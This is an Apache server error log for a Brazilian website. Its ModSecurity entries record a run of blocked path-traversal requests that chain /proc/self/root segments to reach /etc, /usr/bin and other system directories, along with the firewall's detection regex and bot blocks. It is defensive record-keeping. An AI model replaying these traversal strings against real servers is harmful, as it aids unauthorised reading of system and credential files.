[Thu Mar 19 03:28:41.527472 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:47620] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuXmda6ubjKNq_cu4YA8gAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:28:44.969812 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.241.31:47622] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuXnMdf6f5d65gmYZQ2GQAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:28:46.842202 2026] [:error] [pid 27403:tid 140411582465792] [client 74.7.241.31:47638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuXnhkFeYa1D6dYQnCv3AAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:28:48.524420 2026] [mime_magic:error] [pid 19093:tid 140411582465792] (70014)End of file found: [client 57.141.18.64:53860] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:28:53.550502 2026] [mime_magic:error] [pid 27293:tid 140411557287680] (70014)End of file found: [client 57.141.18.101:53922] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:28:55.835473 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:55204] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuXpta6ubjKNq_cu4YA9wAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:28:58.004417 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:55204] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuXqda6ubjKNq_cu4YA-QAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:29:00.125808 2026] [proxy_fcgi:error] [pid 26799:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:52614] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:29:09.638378 2026] [:error] [pid 19093:tid 140411741927168] [client 74.7.241.31:52756] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuXtV_V7PWP6ixUYl5_IAAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:29:14.673370 2026] [:error] [pid 19093:tid 140411540502272] [client 74.7.241.31:52756] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuXul_V7PWP6ixUYl5_KQAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:29:22.126330 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:53056] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:29:45.142986 2026] [proxy_fcgi:error] [pid 30077:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:53538] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:29:55.843715 2026] [core:alert] [pid 26799:tid 140411632822016] [client 57.141.18.47:55424] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 03:30:03.547007 2026] [core:alert] [pid 17653:tid 140411607643904] [client 57.141.18.11:55576] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 03:30:03.680929 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.241.31:53724] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuX6-oXxyEfFpUF8f_U6wAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:30:08.243134 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:43594] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuX8Na6ubjKNq_cu4YBMQAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:30:09.203123 2026] [mime_magic:error] [pid 30077:tid 140411557287680] (70014)End of file found: [client 74.7.243.128:47918] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/lib/yum/yumdb/p
[Thu Mar 19 03:30:09.203243 2026] [access_compat:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:47918] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/lib/yum/yumdb/p
[Thu Mar 19 03:30:12.137801 2026] [proxy_fcgi:error] [pid 26799:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:54052] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:30:13.478071 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.241.31:43600] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuX9QkwaGbbGflqUZB2eQAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:30:15.922960 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.241.31:43616] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuX98df6f5d65gmYZQ2SgAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:30:42.118262 2026] [proxy_fcgi:error] [pid 27403:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:54606] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:30:54.018342 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.241.31:33158] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuYHsdf6f5d65gmYZQ2ZAAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:31:13.131308 2026] [proxy_fcgi:error] [pid 15826:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:55242] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:31:44.568435 2026] [proxy_fcgi:error] [pid 17653:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:55926] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:31:46.546762 2026] [mime_magic:error] [pid 17653:tid 140411666392832] (70014)End of file found: [client 57.141.18.63:57468] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:31:48.194681 2026] [core:alert] [pid 17653:tid 140411574073088] [client 57.141.18.51:57020] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 03:31:49.964782 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:59744] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuYVda6ubjKNq_cu4YBfAAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:31:51.099100 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.244.43:43464] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuYV-oXxyEfFpUF8f_VJQAAAVU"]
[Thu Mar 19 03:32:11.137860 2026] [proxy_fcgi:error] [pid 30077:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:56656] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:32:36.121797 2026] [proxy_fcgi:error] [pid 31803:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:57140] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:32:54.074346 2026] [core:alert] [pid 30077:tid 140411582465792] [client 57.141.18.55:59478] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 03:32:59.572796 2026] [mime_magic:error] [pid 31803:tid 140411624429312] (70014)End of file found: [client 57.141.18.14:59620] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:33:00.127468 2026] [proxy_fcgi:error] [pid 17653:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:57626] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:33:13.815639 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:55304] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuYqQkwaGbbGflqUZB2-AAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:33:22.145830 2026] [proxy_fcgi:error] [pid 17887:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:58066] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:33:29.609069 2026] [mime_magic:error] [pid 31803:tid 140411649607424] (70014)End of file found: [client 57.141.18.102:59962] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:33:44.133789 2026] [proxy_fcgi:error] [pid 15826:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:58602] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:34:04.871804 2026] [:error] [pid 14269:tid 140411649607424] [client 74.7.228.61:41908] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuY3AbLMZ6AikZjR9UhBQAAAAs"]
[Thu Mar 19 03:34:06.125801 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:59076] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:34:13.050625 2026] [mime_magic:error] [pid 17653:tid 140411649607424] (70014)End of file found: [client 74.7.241.31:41402] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/bin
[Thu Mar 19 03:34:13.050783 2026] [access_compat:error] [pid 17653:tid 140411649607424] [client 74.7.241.31:41402] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/bin
[Thu Mar 19 03:34:29.129805 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:59660] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:34:51.119514 2026] [proxy_fcgi:error] [pid 14269:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:60176] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:34:58.140393 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:60894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuZEuoXxyEfFpUF8f_VjwAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:34:58.666820 2026] [mime_magic:error] [pid 15826:tid 140411708356352] (70014)End of file found: [client 74.7.243.128:60894] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/kbd/keymaps/xkb
[Thu Mar 19 03:35:15.125778 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:60688] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:35:37.142554 2026] [proxy_fcgi:error] [pid 14269:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:32892] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:35:48.766719 2026] [core:alert] [pid 17887:tid 140411699963648] [client 57.141.18.80:35550] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
